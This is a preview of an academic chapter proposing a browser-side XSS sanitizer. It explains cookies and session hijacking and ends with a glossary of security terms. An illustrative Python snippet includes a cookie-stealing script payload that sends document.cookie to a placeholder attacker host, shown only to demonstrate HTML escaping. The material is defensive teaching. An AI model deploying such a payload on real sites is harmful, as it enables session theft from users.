BDS: Browser Dependent XSS Sanitizer

Shashank Gupta (National Institute of Technology Kurukshetra, India) and B. B. Gupta (National Institute of Technology Kurukshetra, India)
DOI: 10.4018/978-1-4666-6559-0.ch008


Cross-Site Scripting (XSS) is a vulnerability exploited in the client-side browser that is caused by improper sanitization of user input embedded in Web pages. Researchers have proposed various defensive strategies, vulnerability scanners, etc., but XSS flaws still remain in Web applications due to inadequate understanding and implementation of these defensive tools and strategies. Therefore, in this chapter, the authors propose a security model called Browser Dependent XSS Sanitizer (BDS) on the client-side Web browser for eliminating the effect of XSS vulnerabilities. Various earlier client-side solutions degrade performance on the Web browser side. In this chapter, the authors use a three-step approach to thwart XSS attacks without degrading much of the user's Web browsing experience. In the authors' experiments, this approach was capable of preventing XSS attacks on various modern Web browsers.
Chapter Preview


In the early days of the World Wide Web (WWW), static web pages were used on the web server side to respond to user requests. As the name suggests, these web pages deliver content in the response exactly as it is stored on the web server. They are suitable for content that rarely or never needs to be updated. Static web pages raised no major security concerns. However, maintaining a large number of static web pages on the web server side is infeasible without automated tools. Therefore, the performance of a web server that relies on static web pages becomes a bottleneck.

To make web pages richer and more interactive, web applications moved to dynamic web pages. These pages are designed to deliver personalized, up-to-date information to the client. Dynamic web pages generally generate the content of a response page based on user-supplied input. The client's web browser initiates the interaction by sending an HTTP request to the web server. The web server collects data from various resources, assembles it into one web page, and finally transmits it to the web browser. Many features of dynamic web pages (such as bulletin boards, search engines, and login forms) require interaction between the web server and the user.

Apart from these useful features, dynamic web pages also allow attackers to embed malicious code. When such malicious code is executed by the web browser, the user's sensitive resources (e.g. cookies, credit card numbers) can be compromised. Modern dynamic web applications protect some of a user's important credentials (such as user ID and password). However, other sensitive credentials (e.g. cookies) remain attractive targets for attackers. If such credentials are compromised, the attacker can hijack the victim's session, access the confidential resources of the web application, and so on.

Cross-Site Scripting (XSS) (Alfaro et al., 2007) is one such vulnerability, generally caused by improper sanitization of user input. The web server processes the input without checking for malicious code injected into it, embeds this content in the web page, and sends the page to the web browser. The web browser executes the injected code, which transfers the victim's sensitive resources to the attacker's domain. The main goal of an XSS attack is to steal the cookies from the victim's web browser and send them to the attacker's web application. Later, the attacker can use these cookies to access the victim's sensitive resources in the web application.
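The effect of improper sanitization can be illustrated with a minimal Python sketch. It is not the BDS model proposed in this chapter; it only contrasts a page that embeds user input verbatim with one that encodes it using the standard-library function `html.escape`. The function names, the page template, and the `attacker.example` URL are hypothetical and chosen purely for illustration.

```python
import html


def render_greeting_unsafe(name: str) -> str:
    # Vulnerable: the user-supplied value is embedded in the page verbatim,
    # so any markup it contains becomes part of the HTML sent to the browser.
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    # html.escape replaces &, <, > and (by default) quote characters with
    # HTML entities, so injected markup is displayed as text, not executed.
    return f"<p>Hello, {html.escape(name)}!</p>"


# Hypothetical cookie-stealing payload; attacker.example is a placeholder.
payload = (
    "<script>document.location="
    "'http://attacker.example/?c='+document.cookie</script>"
)

unsafe_page = render_greeting_unsafe(payload)
safe_page = render_greeting_safe(payload)

print(unsafe_page)
print(safe_page)
```

In the unsafe page the browser would receive a live `<script>` element, whereas in the safe page the same input arrives as inert text beginning with `&lt;script&gt;`.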

Hyper Text Transfer Protocol (HTTP) (Gourley et al., 2002) is a client/server Internet protocol generally used for information exchange between the client and the server. It is a stateless protocol, so it does not store any information about the session between the client and the web server. It also does not guarantee that successive HTTP requests and their corresponding HTTP responses belong to the same user. Therefore, this protocol by itself cannot establish the identity of the user. To overcome this problem, cookies were introduced; these are small text files generated on the web server side.

A cookie is shared between the web browser and the web server. The main goal of sharing it is to maintain continuity between them. Web applications generally use cookies as a mechanism for creating stateful HTTP sessions. Cookies are supported by nearly all current web browsers and therefore allow greater flexibility in how user sessions are maintained by web applications. Web applications that need authentication frequently use cookies to store session IDs (Kristol, 2000) and pass the cookies to users after they have been authenticated. The cookies are stored in the user's web browser. The web browser returns the cookies with every request it makes as part of an active session, and the web application uses them to associate the request with the user. Figure 1 shows the scenario of cookie sharing between the web browser and web server.

Figure 1. Cookie file sharing between the Web browser and Web server
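The cookie exchange described above can be sketched with Python's standard `http.cookies` module. This is only an illustration under stated assumptions: the cookie name `session_id` and both helper functions are hypothetical, and the `HttpOnly` attribute is an addition not discussed in the text (it asks the browser to hide the cookie from scripts, which limits what an injected script can steal).

```python
import secrets
from http.cookies import SimpleCookie
from typing import Optional, Tuple


def issue_session_cookie() -> Tuple[str, str]:
    """Server side: create a session ID and the matching Set-Cookie value."""
    session_id = secrets.token_hex(16)  # random, hard-to-guess identifier
    cookie = SimpleCookie()
    cookie["session_id"] = session_id   # "session_id" is a hypothetical name
    cookie["session_id"]["path"] = "/"
    # Assumption beyond the text: mark the cookie HttpOnly so that
    # document.cookie in the browser cannot read it.
    cookie["session_id"]["httponly"] = True
    return session_id, cookie["session_id"].OutputString()


def read_session_cookie(cookie_header: str) -> Optional[str]:
    """Server side: recover the session ID from a returned Cookie header."""
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    morsel = cookie.get("session_id")
    return morsel.value if morsel is not None else None


# The server issues the cookie after authentication...
sid, set_cookie_value = issue_session_cookie()
print("Set-Cookie:", set_cookie_value)

# ...and the browser sends it back with each later request in the session.
returned = read_session_cookie(f"session_id={sid}")
print("Session recognised:", returned == sid)
```

Because the web application identifies the user solely by this returned value, anyone who obtains the cookie can present it and be treated as the victim, which is why cookies are the usual target of XSS attacks.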

Key Terms in this Chapter

Session Hijacking: It is a form of attack in which an attacker seizes a valid session token from the network and thereby gains access to the confidential resources of the web application. This attack can enable man-in-the-middle attacks, etc.

Cookies: Cookies are small text files which are generally stored in the web browser's directory. They are produced on the web server side whenever a user browses a particular website. The website uses them to verify the identity of the user, keep track of the user's movements within the website, etc.

Virus: It is a malicious program which, when executed, replicates itself into other programs and may corrupt or delete important files. Its effects can consume a large amount of memory and can also halt the system.

HTTPS: (Hyper Text Transfer Protocol Secure) is not a separate protocol in itself but the result of layering the HTTP protocol on top of the SSL/TLS protocol, thereby adding security features to HTTP. The main motivation for HTTPS is to prevent various types of attacks such as man-in-the-middle attacks.

MAC Address: It is the physical address of a computer on the network, which uniquely identifies each computer in the network.

Hyperlink: A hyperlink, commonly known as a link, is a means of moving from one web page to another linked web page (or to some other document, text, image, etc.).

Client: A client is a computer which sends requests to and receives responses from the server. A client is therefore an entity which uses the services made available by the server. A server can also be a client of some other server.

Software: It is a collection of computer programs (which are installed and stored on the hardware) designed to perform an automated task.

Web Browser: It is a program (application software) which is used on the client-side machine for retrieving and displaying information on the World Wide Web (WWW). It is also used for navigating from one web page to another, displaying web pages, accessing e-mail, etc.

ARP: (Address Resolution Protocol) is a protocol which is normally used to map a computer's IP address to its MAC address (also called physical address).

Zero Day Exploit: An exploit that takes advantage of a security vulnerability on the same day, or before, the vulnerability becomes public. These attacks can be extremely dangerous because they exploit security holes for which no fix is yet available.

Port Number: It is an address which uniquely identifies each process on an end destination. These port numbers are normally used in the transport layer of the OSI model.

HTTP: (Hyper Text Transfer Protocol) is an application protocol used on the Internet for transferring various kinds of files (e.g. text, images, audio, video and other multimedia files) on the World Wide Web (WWW).

Spyware: It is a program that is installed on a computer and keeps track of the user's online activity. Spyware can also be installed automatically, without the user's consent, during the installation of other software.

JavaScript: It is a dynamic programming language which is included as part of HTML files. It was introduced into HTML source code mainly to make web pages more interactive. Its code can control the web browser and modify the web page that is displayed.

Encryption: It is a technique of transforming readable text into a non-readable form in order to protect the privacy of information.

Web Server: It is a program that fulfills requests for web pages coming from the web browser side. The term covers both the hardware and the software that deliver web pages to the requesting party. Web servers are normally used for enterprise data storage, hosting web sites, etc.

XSS Attack: Cross-Site Scripting (XSS) attack is commonly found in modern web applications. Its main goal is to access the sensitive resources (e.g. cookies) of a client's web browser by injecting malicious scripts into web pages which are accessed or viewed by other users.

Integrity: It is the property by which we can validate whether the information contained in a document has been altered.

Wiretapping: It is a technique of observing and analyzing the flow of data in a network in an active or passive mode. An attacker can carry out a denial of service attack by means of wiretapping.

URL: (Uniform Resource Locator) is a unique address (web address) in the form of a string which is generally used to access web pages on the Internet. These addresses normally define the location of resources on the network.

Malicious Code: It is code which looks legitimate but is intended to produce undesirable results (such as stealing cookies or credit card numbers).

Malware: It is any type of malicious software or program created to gain unauthorized access to information or to produce undesirable results. Any type of computer virus is malware.

Spoofing: It is a malicious technique of sending forged IP addresses on the network and thereby gaining unauthorized access to the system. Another example is caller ID spoofing: telephone calls are normally identified by the caller's name and number, but caller ID information can be forged to display a wrong name and phone number.

Pop-Up Messages: It is a type of online alert or message usually seen in a small message box on the computer screen. Various types of e-mail alerts, warnings, etc. are displayed in the form of pop-up messages.

Eavesdropping: It is the illegal interception of packets transmitted by other computers on a network. It is also known as sniffing, and its aim is to secretly listen to others' information without their permission.

WWW: (World Wide Web) is a way of using the capabilities of the Internet. It provides connectivity to interlinked hypertext documents and machines on the Internet.

HTML: (HyperText Markup Language) is a language used on the World Wide Web (WWW) to craft web pages. It is used for marking up text files to specify colour, fonts, graphics, links to other web pages, etc.
